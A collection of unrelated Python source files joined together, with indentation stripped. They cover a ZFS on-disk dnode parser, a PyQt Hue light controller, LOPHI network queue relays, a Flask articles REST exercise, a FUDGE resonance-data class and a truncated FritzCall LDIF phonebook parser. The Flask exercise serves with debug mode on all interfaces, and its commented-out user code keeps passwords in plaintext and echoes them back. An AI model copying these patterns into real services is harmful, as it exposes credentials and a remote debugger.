# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import struct, datetime
from zfs.blockptr import BlockPtr
from zfs.obj_desc import DMU_TYPE_DESC
BLKPTR_OFFSET = 64
class BonusDataset:
def __init__(self, data):
(self.ds_dir_obj, self.ds_prev_snap_obj, self.ds_prev_snap_txg, self.ds_prev_next_obj, self.ds_snapnames_zapobj,
self.ds_num_children, self.ds_creation_time, self.ds_creation_txg, self.ds_deadlist_obj, self.ds_used_bytes,
self.ds_compressed_bytes, self.ds_uncompressed_bytes, self.ds_unique_bytes, self.ds_fsid_guid, self.ds_guid,
self.ds_restoring) = struct.unpack("=16Q", data[:16*8])
self.bptr = BlockPtr()
self.bptr.parse(data[16*8:16*8+128])
def __str__(self):
fields = [
'ds_dir_obj',
'ds_prev_snap_obj',
'ds_prev_snap_txg',
'ds_prev_next_obj',
'ds_snapnames_zapobj',
'ds_num_children',
'ds_creation_time',
'ds_creation_txg',
'ds_deadlist_obj',
'ds_used_bytes',
'ds_compressed_bytes',
'ds_uncompressed_bytes',
'ds_unique_bytes',
'ds_fsid_guid',
'ds_guid',
'ds_restoring',
'ds_bp'
]
fmt = ' '.join([f + '={}' for f in fields])
return fmt.format(
self.ds_dir_obj,
self.ds_prev_snap_obj,
self.ds_prev_snap_txg,
self.ds_prev_next_obj,
self.ds_snapnames_zapobj,
self.ds_num_children,
self.ds_creation_time,
self.ds_creation_txg,
self.ds_deadlist_obj,
self.ds_used_bytes,
self.ds_compressed_bytes,
self.ds_uncompressed_bytes,
self.ds_unique_bytes,
self.ds_fsid_guid,
self.ds_guid,
self.ds_restoring,
self.bptr
)
class BonusDirectory:
def __init__(self, data):
(
self.dd_creation_time,
self.dd_head_dataset_obj,
self.dd_parent_obj,
self.dd_clone_parent_obj,
self.dd_child_dir_zapobj,
self.dd_used_bytes,
self.dd_compressed_bytes,
self.dd_uncompressed_bytes,
self.dd_quota,
self.dd_reserved,
self.dd_props_zapobj
) = struct.unpack("=11Q", data[:11*8])
def __str__(self):
fields = [
'dd_creation_time',
'dd_head_dataset_obj',
'dd_parent_obj',
'dd_clone_parent_obj',
'dd_child_dir_zapobj',
'dd_used_bytes',
'dd_compressed_bytes',
'dd_uncompressed_bytes',
'dd_quota',
'dd_reserved',
'dd_props_zapobj',
]
fmt = ' '.join([f+'={}' for f in fields])
return fmt.format(
self.dd_creation_time,
self.dd_head_dataset_obj,
self.dd_parent_obj,
self.dd_clone_parent_obj,
self.dd_child_dir_zapobj,
self.dd_used_bytes,
self.dd_compressed_bytes,
self.dd_uncompressed_bytes,
self.dd_quota,
self.dd_reserved,
self.dd_props_zapobj
)
class BonusZnode:
def __init__(self, data):
(
self.zp_atime, self.zp_atime_ns,
self.zp_mtime, self.zp_mtime_ns,
self.zp_ctime, self.zp_ctime_ns,
self.zp_crtime, self.zp_crtime_ns,
self.zp_gen,
self.zp_mode,
self.zp_size,
self.zp_parent,
self.zp_links,
self.zp_xattr,
self.zp_rdev,
self.zp_flags,
self.zp_uid, self.zp_gid
) = struct.unpack("=18Q", data[:18*8])
self.zp_inline_content = data[264:]
def size(self):
return self.zp_size
def mtime(self):
return self.zp_mtime
def mode(self):
return self.zp_mode
def uid(self):
return self.zp_uid
def gid(self):
return self.zp_gid
def __str__(self):
fields = [
'zp_atime', 'zp_atime_ns',
'zp_mtime', 'zp_mtime_ns',
'zp_ctime', 'zp_ctime_ns',
'zp_crtime', 'zp_crtime_ns',
'zp_gen',
'zp_mode',
'zp_size',
'zp_parent',
'zp_links',
'zp_xattr',
'zp_rdev',
'zp_flags',
'zp_uid', 'zp_gid'
]
fmt = ' '.join([f+'={}' for f in fields])
return fmt.format(
self.zp_atime, self.zp_atime_ns,
self.zp_mtime, self.zp_mtime_ns,
self.zp_ctime, self.zp_ctime_ns,
self.zp_crtime, self.zp_crtime_ns,
self.zp_gen,
self.zp_mode,
self.zp_size,
self.zp_parent,
self.zp_links,
self.zp_xattr,
self.zp_rdev,
self.zp_flags,
self.zp_uid, self.zp_gid
)
class BonusSysAttr:
def __init__(self, objset, data):
if objset is None:
return;
try:
SA_MAGIC=0x2F505A
(magic,layoutid,hdrsz,l) = struct.unpack("=IBBH",data[0:8])
if not (magic == SA_MAGIC):
print("[-] Error: SA_MAGIC wrong")
hdrsz *= 2
if layoutid == 3:
print("Symlink")
lenidx = 0
if (hdrsz < 8):
hdrsz = 8
ptr = hdrsz
#ptr = 8 #skip sa_hdr_phys_t
for f in objset._sa._lay[str(layoutid)]:
l = f['len']
b = data[ptr:ptr+l]
v = None
if (l == 16):
(v0,v1) = struct.unpack("=QQ",b)
v = [v0,v1];
elif (l == 8):
v, = struct.unpack("=Q",b)
elif (l == 4):
v, = struct.unpack("=I",b)
elif (l == 0):
l, = struct.unpack("=H",data[6+lenidx*2:6+lenidx*2+2])
lenidx += 1
if (f['name'] == "zpl_dacl_aces"):
pass
elif (f['name'] == "zpl_symlink"):
v = data[ptr:ptr+l]
#ptr = len(data)
ptr += l
setattr(self,f['name'], v);
n = f['name'].replace("zpl_","zp_");
setattr(self,n, v);
self.zp_inline_content = None
#ZFS_OLD_ZNODE_PHYS_SIZE=0x108
#if (len(data) > ZFS_OLD_ZNODE_PHYS_SIZE):
self.zp_inline_content = data[ptr:]
except:
pass
def size(self):
return self.zpl_size
def mtime(self):
try:
return self.zpl_mtime[0]
except:
return datetime.datetime.now().timestamp()
def mode(self):
return self.zpl_mode
def uid(self):
return self.zpl_uid
def gid(self):
return self.zpl_gid
def __str__(self):
pass
DNODE_FLAG_USED_BYTES=(1 << 0)
class DNode:
def __init__(self, data=None, objset=None):
self._data = None
self._type = None # uint8_t 1
self._indblkshift = None # uint8_t 1
self._nlevels = None # uint8_t 1
self._nblkptr = None # uint8_t 1
self._bonustype = None # uint8_t 1
self._checksum = None # uint8_t 1
self._compress = None # uint8_t 1
self._flags = None # uint8_t 1
self._datablkszsec = None # uint16_t 2
self._bonuslen = None # uint16_t 2
self._extra_slots = None # uint8_t 1
self._pad2 = None # uint8_t[4] 4
self._maxblkid = None # uint64_t 8
self._used = None # uint64_t 8
self._pad3 = None # uint64_t[4] 32
self._blkptr = None # blkptr_t[N] @64
self._bonus = None # uint8_t[BONUSLEN]
self._datablksize = None
self._objset = objset
if data is not None:
self.parse(data)
def parse(self, data):
if len(data) < 512:
raise ValueError("Data is too small")
# Save data for dumping purposes
self._data = data[:]
(self._type, self._indblkshift, self._nlevels, self._nblkptr,
self._bonustype, self._checksum, self._compress, self._flags,
self._datablkszsec, self._bonuslen, self._extra_slots, self._maxblkid,
self._used) = struct.unpack("=8B2HB3xQQ32x", data[:BLKPTR_OFFSET])
if self._type == 0:
return
# Object type > 100 (or even 53) is probably due to data error
elif self._type > 100:
if self._type==196: # on linux 196 is "zap" with "bonustype dataset"
pass
else:
self._invalidate()
return
self._blkptr = []
if self._nblkptr > 3:
# More than three block pointers is a sign of data error
self._invalidate()
return
self._used = self._used << 9 if not self._flags & DNODE_FLAG_USED_BYTES else self._used;
self._datablksize = self._datablkszsec << 9
ptr = BLKPTR_OFFSET
for bn in range(self._nblkptr):
b = BlockPtr(data=data[ptr:ptr+128])
self._blkptr.append(b)
ptr += 128
bonus_data = data[ptr:ptr+self._bonuslen]
if self._bonuslen and self._bonustype == 12:
self._bonus = BonusDirectory(bonus_data)
elif self._bonuslen and self._bonustype == 16:
self._bonus = BonusDataset(bonus_data)
elif self._bonuslen and self._bonustype == 17:
self._bonus = BonusZnode(bonus_data)
elif self._bonuslen and self._bonustype == 0x2c:
self._bonus = BonusSysAttr(self._objset, bonus_data)
else:
self._bonus = bonus_data
@property
def blkptrs(self):
return self._blkptr
@property
def maxblkid(self):
return self._maxblkid
@property
def bonus(self):
return self._bonus
@property
def type(self):
return self._type
@property
def levels(self):
return self._nlevels
@property
def datablksize(self):
return self._datablksize
@property
def indblkshift(self):
return self._indblkshift
def dump_data(self, file_path):
with open(file_path, 'wb') as f:
f.write(self._data)
def _invalidate(self):
self._type = None
def __str__(self):
if self._type is None:
return "<invalid dnode>"
elif self._type == 0:
return "<unallocated dnode>"
try:
if self._type == 196:
dmu_type = "zap"
else:
dmu_type = DMU_TYPE_DESC[self._type]
except IndexError:
dmu_type = "unk_{}".format(self._type)
bptrs = " ".join(["blkptr[{}]={}".format(i, v) for i, v in enumerate(self._blkptr)])
bonus = " bonus[{}]".format(self._bonuslen) if self._bonuslen else ""
if self._bonustype in [12, 16]:
bonus += "=[{}]".format(self._bonus)
return "[{}] {}B {}L/{} {}{}".format(dmu_type, self._maxblkid+1,
self._nlevels, 1 << self._indblkshift, bptrs, bonus)
@staticmethod
def from_bptr(vdev, bptr, dvas=(0, 1), objset=None):
data = None
for dva in dvas:
data,c = vdev.read_block(bptr, dva=dva)
if data and c:
break
if data is None:
return None
dn = DNode(objset=objset)
dn.parse(data)
return dn
|
<filename>main.py
import sys
from PyQt5.QtWidgets import *
from Widgets.color_btns import ColorBtn
from Widgets.connection_handler import ConnectionHandler
from Widgets.sliders import *
from hue import *
from styling import *
class Window(QMainWindow):
def __init__(self, bridge):
super().__init__()
self.setWindowTitle("Disco Phillip"), self.setGeometry(100, 100, 650, 350)
self.color_btns = []
self.bridge = bridge
self.light = Light(self.bridge, 1)
self.Styling = Styling('yellow')
self.bri_value = 0
self.styles = self.Styling.get_styles('yellow')
self.connection_handler = ConnectionHandler(self)
# Color Buttons
self.color_btns = [
ColorBtn('red', '#ff0000', [380, 280], self), ColorBtn('blue', '#0000ff', [275, 70], self),
ColorBtn('orange', '#ff7700', [170, 175], self), ColorBtn('green', '#00ff00', [275, 280], self),
ColorBtn('pink', '#ff00ff', [380, 175], self), ColorBtn('purple', '#7700ff', [380, 70], self),
ColorBtn('purple', '#7700ff', [380, 70], self), ColorBtn('lightblue', '#00ffff', [170, 70], self),
ColorBtn('yellow', '#ffff00', [170, 280], self)
]
# White on/off button, in the middle of colored button
self.on_off_button = QPushButton("", self)
self.on_off_button.setStyleSheet("background-color : white; color : white; border:black")
self.on_off_button.clicked.connect(self.on_off)
self.on_off_button.setGeometry(275, 175, 100, 100)
# Brightness Slider(Horizontal), Speed slider (Vertical)
self.bri_slider = BrightnessSlider([170, 40, 310, 20], 0, "brightness_slider", self)
self.speed_slider = SpeedSlider([135, 75, 20, 300], "speed_slider", 0, 50, self)
# Stylesheet for sliders
self.setStyleSheet(self.styles)
# Attempt Connection to bridge
self.connection_handler.connect_bridge('Disconnected. Click to connect')
# Show gui
self.update()
self.show()
def set_light(self, light):
"""Setting color of gui elements based on HUE status"""
self.light = light
self.color_update()
if not self.light.get_status()['on']:
for btn in self.color_btns:
btn.off()
else:
self.bri_update()
def bri_update(self):
"""Set Brightness based on hue"""
if self.light.get_status()['on']:
bri_status = self.light.get_status()['bri']
bri_value = round(bri_status / 256 * 100)
self.bri_slider.setValue(bri_value)
self.bri_value = bri_value
else:
self.bri_slider.setValue(0)
def bri_update_after_on(self): # work around bug with hue
self.bri_slider.setValue(self.bri_value)
self.bri_slider.change_bri(self.bri_value)
def disabled(self):
for btn in self.color_btns:
btn.off()
def color_update(self):
current_color = self.light.get_color()
self.styles = self.Styling.get_styles('#' + current_color)
self.setStyleSheet(self.styles)
def on_off(self):
"""Turn light on/off"""
try:
light_on = self.light.get_status()['on']
if light_on:
for btn in self.color_btns:
btn.off()
self.light.off()
self.bri_slider.setValue(0)
self.speed_slider.setValue(0)
else:
for btn in self.color_btns:
btn.on()
self.light.on()
self.color_update()
self.bri_update_after_on() # Set brightness to what it was before, cannot trust was api says
except GenericHueError as e:
self.connection_handler.update_status(str(e), True)
except (TypeError, KeyError, UnauthorizedUserError):
self.connection_handler.update_status('Not Connected', True)
main_bridge = Bridge()
App = QApplication(sys.argv)
window = Window(main_bridge)
sys.exit(App.exec())
|
<filename>lophi-automation/lophi_automation/dataconsumers/remotequeue.py
"""
Unused classes for handling remote queues
(c) 2015 Massachusetts Institute of Technology
"""
import socket
import time
import multiprocessing
import lophi.globals as G
import lophi_automation.protobuf.helper as ProtoBuf
class ClientRelay(multiprocessing.Process):
"""
Small subclass that simply relays and object from socket to queue
"""
def __init__(self, sock, addr, queue):
""" Rember our socket """
self.SOCK = sock
self.address = addr
self.OUTPUT_QUEUE = queue
self.RUNNING = True
multiprocessing.Process.__init__(self)
def cleanup(self, sig, func=None):
""" Cleanup our children and our sockets nicely """
# Stop exectution
self.RUNNING = False
# Shtudown our socket
self.SOCK.shutdown(socket.SHUT_RDWR)
# Kill our queue
self.OUTPUT_QUEUE.cancel_join_thread()
self.OUTPUT_QUEUE.close()
def run(self):
""" Loop until we fail relaying objects """
# Set our handler to close gracefully
G.set_exit_handler(self.cleanup)
if G.VERBOSE:
print "Relaying data from socket to queue."
while self.RUNNING:
# Try to unpack it
try:
# Get our data
data = G.read_socket_data(self.SOCK)
# Unpack our sensor output
data = ProtoBuf.unpack_sensor_output(data)
except EOFError:
if G.VERBOSE:
print "RemoteQueue: Looks like our socket closed."
break
except:
# Just die!
if self.RUNNING:
print "ERROR/RemoteQueue: Could not unpickle network data."
break
# update our machine name to indicate its origin
data['MACHINE'] = self.address[0] + "-" + data['MACHINE']
# Write the data to our queue, if we can
try:
self.OUTPUT_QUEUE.put(data, False)
except:
if self.RUNNING:
print "ERROR/RemoteQueue: Could not write to output queue."
G.print_traceback()
break
# Close socket
self.SOCK.close()
class RemoteQueueServer(multiprocessing.Process):
"""
This class handles receiving objects over the network for us.
"""
def __init__(self, output_queue):
""" Remember the socket that we are relaying data to """
self.RUNNING = True
multiprocessing.Process.__init__(self)
self.OUTPUT_QUEUE = output_queue
self.clients = []
def cleanup(self, sig, func=None):
""" Cleanup our children and our sockets nicely """
if G.VERBOSE:
print "Shutting down nicely..."
# Kill all spawned threads
for c in self.clients:
c.terminate()
c.join()
# Close up shop
self.SOCK.shutdown(socket.SHUT_RDWR)
self.SOCK.close()
# Stop Execution
if G.VERBOSE:
print "Closing..."
self.RUNNING = False
def run(self):
""" Bind a socket, and accept connections that send pickled objects """
# Set our handler to close gracefully
G.set_exit_handler(self.cleanup)
# Open our socket
self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Ignore the silly TIME_WAIT state
self.SOCK.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind to our address/port
BOUND = False
while not BOUND:
try:
self.SOCK.bind(G.QUEUE_ADDR)
BOUND = True
except:
print "RemoteQueue: Cannot bind socket... (Retrying in %d seconds)" % G.LOPHI_BIND_RETRY
time.sleep(G.LOPHI_BIND_RETRY)
# Listen for a client (Only 1 at a time)
self.SOCK.listen(2)
if G.VERBOSE:
print "RemoteQueue: Listening on %s:%s..." % (G.QUEUE_ADDR[0], G.QUEUE_ADDR[1])
while self.RUNNING:
try:
clientsock, addr = self.SOCK.accept()
if G.VERBOSE:
print "RemoteQueue: Got connection from %s:%s." % (addr[0], addr[1])
client = ClientRelay(clientsock, addr, self.OUTPUT_QUEUE)
client.start()
self.clients.append(client)
except:
break
if G.VERBOSE:
print "RemoteQueue: Closed"
class RemoteQueueClient(multiprocessing.Process):
""" This will take a queue as input and relay across a socket """
def __init__(self, input_queue, remote_addr):
""" Remember input and store our remote socket info """
self.INPUT_QUEUE = input_queue
self.sock_addr = (remote_addr[0], G.QUEUE_PORT)
self.RUNNING = True
self.cache = {}
multiprocessing.Process.__init__(self)
def connect(self):
""" Connect to our remote host """
while 1:
try:
if G.VERBOSE:
print "RemoteQueue: Connecting to %s:%d..." % (self.sock_addr[0], self.sock_addr[1])
# Open our socket
self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.SOCK.connect(self.sock_addr)
break
except socket.error:
if G.VERBOSE:
print "RemoteQueue/WARNING: Couldn't connect to %s:%d, retrying in %d seconds..." % (self.sock_addr[0], self.sock_addr[1], G.LOPHI_SOCKET_RETRY)
time.sleep(G.LOPHI_SOCKET_RETRY)
continue
def cleanup(self, sig, func=None):
""" Cleanup our children and our sockets nicely """
# Close our socket nicely
self.SOCK.close()
self.INPUT_QUEUE.close()
self.RUNNING = False
def run(self):
""" Loop forever sending data that is sent in on the queue """
# Set our handler to close gracefully
G.set_exit_handler(self.cleanup)
# Connect to remote host
self.connect()
if G.VERBOSE:
print "Starting RemoteQueue Client..."
# loop forever
while self.RUNNING:
# Get our data
try:
data = self.INPUT_QUEUE.get()
except:
if G.VERBOSE:
print "WARNING: Could not get data from queue!"
pass
if data == G.CTRL_CMD_KILL:
break
###
## TODO : Optimization!!!
###
# Extract index info
# machine = data['MACHINE']
# name = data['SUA_NAME']
# profile = data['SUA_PROFILE']
module = data['MODULE_NAME']
pb2_data = ProtoBuf.pack_sensor_output(data)
# Is this something new? If not lets not waste the bandwidth
if module not in self.cache or self.cache[module] != data:
self.cache[module] = data
else:
continue
# Try to write it to our socket
while True:
try:
G.send_socket_data(self.SOCK, pb2_data)
break
except:
if G.VERBOSE:
print "RemoteQueueClient: Socket Closed."
# Clear our cache and try to reconnect
del self.cache[module]
self.connect()
# Close our socket nicely
self.SOCK.close()
|
<reponame>sisobus/WebStudio2019
from flask import Flask, request
from flask_restful import Api, Resource
import json
import os
app = Flask(__name__)
api = Api(app)
def get_id(l):
_id = 0
for d in l:
_id = max(d['id'], _id)
return _id + 1
"""
class UserList(Resource):
filename = 'users.json'
def get_users(self):
users = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
users = json.loads(fp.read())
return users
def get(self):
return json.dumps(self.get_users())
def post(self):
r_json = request.get_json()
email = r_json['email']
password = r_<PASSWORD>['password']
r = self.get_users()
for d in r:
if email == d['email']:
return '{} is aleady exists'.format(email)
_id = get_id(r)
r_json['id'] = _id
r.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(r))
return 'email: {}, pw: {}'.format(email, password)
def put(self):
r_json = request.get_json()
_id = r_json['id']
password = r_json['password']
users = self.get_users()
found = False
for idx, _ in enumerate(users):
if users[idx]['id'] == _id:
found = True
users[idx]['password'] = password
if not found:
return '{} is not exists'.format(_id)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(users))
return 'update password successfully'
def delete(self):
r_json = request.get_json()
_id = r_json['id']
users = self.get_users()
found = False
for idx, _ in enumerate(users):
if users[idx]['id'] == _id:
found = True
del users[idx]
if not found:
return '{} is not exists'.format(_id)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(users))
return '{} deleted successfully'.format(_id)
"""
class ArticleList(Resource):
filename = 'articles.json'
def get_articles(self):
ret = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
ret = json.loads(fp.read())
return ret
def get(self):
return json.dumps(self.get_articles())
def post(self):
r_json = request.get_json()
user_id = r_json['user_id']
title = r_json['title']
content = r_json['content']
articles = self.get_articles()
_id = get_id(articles)
r_json['id'] = _id
articles.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(articles))
return "write successfully"
def put(self):
r_json = request.get_json()
_id = r_json['id']
title = r_json['title']
content = r_json['content']
articles = self.get_articles()
for article in articles:
if article['id'] == _id:
article['title'] = title
article['content'] = content
with open(self.filename, 'w') as fp:
fp.write(json.dumps(articles))
return "update successfully"
def delete(self):
r_json = request.get_json()
_id = r_json['id']
new_articles = []
articles = self.get_articles()
for article in articles:
if article['id'] == _id:
continue
new_articles.append(article)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(new_articles))
return "delete successfully"
"""
class CommentList(Resource):
filename = 'comments.json'
def get_comments(self):
ret = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
ret = json.loads(fp.read())
return ret
def get(self):
return json.dumps(self.get_comments())
def post(self):
r_json = request.get_json()
user_id = r_json['user_id']
article_id = r_json['article_id']
content = r_json['content']
comments = self.get_comments()
_id = get_id(comments)
r_json['id'] = _id
comments.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(comments))
return "write successfully"
def put(self):
r_json = request.get_json()
_id = r_json['id']
content = r_json['content']
comments = self.get_comments()
for comment in comments:
if comment['id'] == _id:
comment['content'] = content
with open(self.filename, 'w') as fp:
fp.write(json.dumps(comments))
return "update successfully"
def delete(self):
r_json = request.get_json()
_id = r_json['id']
comments = self.get_comments()
new_comments = []
for comment in comments:
if comment['id'] == _id:
continue
new_comments.append(comment)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(new_comments))
return "delete successfully"
class LikeList(Resource):
filename = 'likes.json'
def get_likes(self):
ret = []
if os.path.exists(self.filename):
with open(self.filename, 'r') as fp:
ret = json.loads(fp.read())
return ret
def get(self):
return json.dumps(self.get_likes())
def post(self):
r_json = request.get_json()
user_id = r_json['user_id']
article_id = r_json['article_id']
likes = self.get_likes()
new_likes = []
found = False
for like in likes:
if like['user_id'] == user_id and like['article_id'] == article_id:
found = True
continue
new_likes.append(like)
if not found:
_id = get_id(likes)
r_json['id'] = _id
new_likes.append(r_json)
with open(self.filename, 'w') as fp:
fp.write(json.dumps(new_likes))
if found:
return "unlike successfully"
return "like successfully"
"""
#api.add_resource(UserList, '/api/users')
api.add_resource(ArticleList, '/api/articles')
#api.add_resource(CommentList, '/api/comments')
#api.add_resource(LikeList, '/api/likes')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True) |
# <<BEGIN-copyright>>
# Copyright 2021, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# <<END-copyright>>
"""
Container for all resonance parameters (resolved, unresolved and/or scattering radius)
"""
from pqu import PQU as PQUModule
import xData.ancestry as ancestryModule
__metaclass__ = type
class resonances( ancestryModule.ancestry ) :
"""
This is the top-level class for storing resonance parameters.
For light targets it may contain only a scattering radius. For heavier targets it typically
contains a resolved and/or unresolved section.
resonances also has a boolean flag 'reconstructCrossSection'. If False, either the cross section
has already been reconstructed, or the parameters are given for information only and no reconstruction
should be performed.
"""
moniker = 'resonances'
ancestryMembers = ('scatteringRadius', 'resolved', 'unresolved')
children = ancestryMembers # This should be deprecated as ancestryMembers suffices.
def __init__(self, scatteringRadius_, resolved_=None, unresolved_=None):
ancestryModule.ancestry.__init__( self )
self.__scatteringRadius = scatteringRadius_
if( self.__scatteringRadius is not None ) : self.__scatteringRadius.setAncestor( self )
self.__resolved = resolved_
self.__unresolved = unresolved_
for child in (self.scatteringRadius, self.resolved, self.unresolved):
if child is not None: child.setAncestor( self )
def __str__( self ) :
""" string representation """
return( self.toString( simpleString = False ) )
@property
def scatteringRadius( self ) :
"""Returns a reference to self's scatteringRadius."""
return( self.__scatteringRadius )
@property
def resolved( self ) :
"""Returns a reference to self's resolved."""
return( self.__resolved )
@property
def unresolved( self ) :
"""Returns a reference to self's unresolved."""
return( self.__unresolved )
def convertUnits( self, unitMap ):
"""
unitMap is a dictionary with old/new unit pairs where the old unit is the key (e.g., { 'eV' : 'MeV', 'b' : 'mb' }).
"""
for child in self.children:
if getattr(self, child) is not None:
getattr(self, child).convertUnits( unitMap )
def check( self, info ):
from fudge import warning
warnings = []
for child in self.children:
section = getattr(self,child)
if section is not None:
warningList = section.check(info)
if warningList:
warnings.append( warning.context( section.moniker, warningList ) )
return warnings
def toXMLList( self, indent = '', **kwargs ) :
indent2 = indent + kwargs.get( 'incrementalIndent', ' ' )
xmlString = [ '%s<%s>' % ( indent, self.moniker ) ]
for child in self.children:
section = getattr(self, child)
if section is not None:
xmlString += section.toXMLList( indent2, **kwargs )
xmlString[-1] += '</%s>' % self.moniker
return xmlString
def domain( self, unitTo = None, asPQU = False ):
""" Return resonance region domain as a tuple of floats: (lowest edge, highest edge).
options:
unitTo: convert output to specified unit (given as a string).
asPQU = True: return a tuple of PhysicalQuantityWithUncertainty instances instead of floats.
"""
bounds = [ (self.scatteringRadius.domainMin, self.scatteringRadius.domainMax) ]
if self.resolved:
if self.resolved.multipleRegions:
bounds += [(reg.domainMin, reg.domainMax) for reg in self.resolved.regions]
else: bounds.append( (self.resolved.domainMin, self.resolved.domainMax) )
if self.unresolved:
bounds.append( (self.unresolved.domainMin, self.unresolved.domainMax) )
for idx in range(len(bounds)-1):
assert bounds[idx][1] == bounds[idx+1][0], "Resonance region boundaries don't match!"
if( asPQU ):
return (bounds[0][0], bounds[-1][1])
elif unitTo:
return (bounds[0][0].getValue(unitTo), bounds[-1][1].getValue(unitTo))
else:
return (bounds[0][0].value, bounds[-1][1].value)
@property
def reconstructCrossSection( self ):
if self.resolved and not self.resolved.evaluated.useForSelfShieldingOnly: return True
if self.unresolved and not self.unresolved.evaluated.useForSelfShieldingOnly: return True
return False
@classmethod
def parseXMLNode( cls, element, xPath, linkData ):
from .resolved import resolved
from .scatteringRadius import scatteringRadius
from .unresolved import unresolved
xPath.append( element.tag )
scatRadius, RRR, URR = None,None,None
for child in element:
if child.tag== scatteringRadius.moniker:
scatRadius = scatteringRadius.parseXMLNode(child, xPath, linkData)
elif child.tag== resolved.moniker:
RRR = resolved.parseXMLNode(child, xPath, linkData)
elif child.tag== unresolved.moniker:
URR = unresolved.parseXMLNode(child, xPath, linkData)
else:
raise Exception("unknown element '%s' encountered in resonances!" % child.tag)
res = cls( scatteringRadius_ = scatRadius, resolved_=RRR, unresolved_=URR )
xPath.pop()
return res
def toString( self, simpleString = False ) :
"""Returns a string representation of self. If simpleString is True,
the string contains only an overview without listing resonances"""
s = 'Resonances:\n'
if self.scatteringRadius:
s += self.scatteringRadius.toString( simpleString = simpleString )
if self.resolved:
s += self.resolved.toString( simpleString = simpleString )
if self.unresolved:
s += self.unresolved.toString( simpleString = simpleString )
return( s )
|
# -*- coding: utf-8 -*-
'''
$Author: michael $
$Revision: 1561 $
$Date: 2020-10-12 15:32:07 +0200 (Mon, 12 Oct 2020) $
$Id: FritzLDIF.py 1561 2020-10-12 13:32:07Z michael $
'''
#
# needs python-ldap for ldif
#
from __future__ import print_function
import ldif, re
try:
from . import normalizePhoneNumber #@UnresolvedImport # pylint: disable-msg=F0401
except ValueError:
def _(string): # pylint: disable-msg=C0103
return string
def normalizePhoneNumber(intNo):
found = re.match('^\+49(.*)', intNo)
if found:
intNo = '0' + found.group(1)
found = re.match('^\+(.*)', intNo)
if found:
intNo = '00' + found.group(1)
intNo = intNo.replace('(', '').replace(')', '').replace(' ', '').replace('/', '').replace('-', '')
found = re.match('^49(.*)', intNo) # this is most probably an error
if found:
intNo = '0' + found.group(1)
found = re.match('.*?([0-9]+)', intNo)
if found:
return found.group(1)
else:
return '0'
import logging
logger = logging.getLogger("[FritzCall] LDIF")
debug = logger.debug
def out(number, name):
print(number + '#' + name)
class FindNumber(ldif.LDIFParser):
def __init__(self, number, inp, outFun):
ldif.LDIFParser.__init__(self, inp)
self.outFun = outFun
self.number = number
try:
self.parse()
except ValueError:
# this is to exit the parse loop
pass
def handle(self, dn, entry):
# debug("[FritzCallPhonebook] LDIF handle: " + dn)
found = re.match('.*cn=(.*),', str(dn))
if found:
name = found.group(1)
else:
return
address = ""
addressB = ""
if 'telephoneNumber' in entry or ('homePhone' in entry and self.number == normalizePhoneNumber(entry['homePhone'][0])) or ('mobile' in entry and self.number == normalizePhoneNumber(entry['mobile'][0])):
# debug("[FritzCallPhonebook] LDIF get address")
if 'telephoneNumber' in entry:
no = normalizePhoneNumber(entry['telephoneNumber'][0])
else:
no = 0
if self.number == no or ('homePhone' in entry and self.number == normalizePhoneNumber(entry['homePhone'][0])) or ('mobile' in entry and self.number == normalizePhoneNumber(entry['mobile'][0])):
nameB = (name + ' (' + _('business') + ')') if name else ""
if 'company' in entry:
nameB = (nameB + ', ' + entry['company'][0]) if nameB else entry['company'][0]
if 'l' in entry:
addressB = entry['l'][0]
if 'postalCode' in entry:
addressB = entry['postalCode'][0] + ' ' + addressB
if 'c' in entry:
addressB = addressB + ', ' + entry['c'][0]
if 'street' in entry:
addressB = entry['street'][0] + ', ' + addressB
# debug("[FritzCallPhonebook] LDIF address: " + addressB)
if self.number == no:
result = nameB + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
debug("[FritzCallPhonebook] LDIF result: " + result)
self.outFun(no, result)
self._input_file.close()
return
else:
if self.number == no:
result = nameB.replace('\n', ', ').replace('\r', '').replace('#', '')
debug("[FritzCallPhonebook] LDIF result: " + result)
self.outFun(no, result)
self._input_file.close()
return
for i in ['homePhone', 'mobile']:
if i in entry:
no = normalizePhoneNumber(entry[i][0])
if self.number == no:
if i == 'mobile':
name = name + ' (' + _('mobile') + ')'
else:
name = name + ' (' + _('home') + ')'
if 'mozillaHomeLocalityName' in entry:
address = entry['mozillaHomeLocalityName'][0]
if 'mozillaHomePostalCode' in entry:
address = entry['mozillaHomePostalCode'][0] + ' ' + address
if 'mozillaHomeCountryName' in entry:
address = address + ', ' + entry['mozillaHomeCountryName'][0]
debug("[FritzCallPhonebook] LDIF home address: " + addressB)
result = name + ', ' + address.replace('\n', ', ').replace('\r', '').replace('#', '')
debug("[FritzCallPhonebook] LDIF result: " + result)
self.outFun(no, result)
self._input_file.close()
return
else:
if addressB:
name = name + ', ' + addressB.replace('\n', ', ').replace('\r', '').replace('#', '')
debug("[FritzCallPhonebook] LDIF result: " + name)
self.outFun(no, name)
self._input_file.close()
return
class ReadNumbers(ldif.LDIFParser):
def __init__(self, inPut, outFun):
ldif.LDIFParser.__init__(self, inPut)
self.outFun = outFun
try:
self.parse()
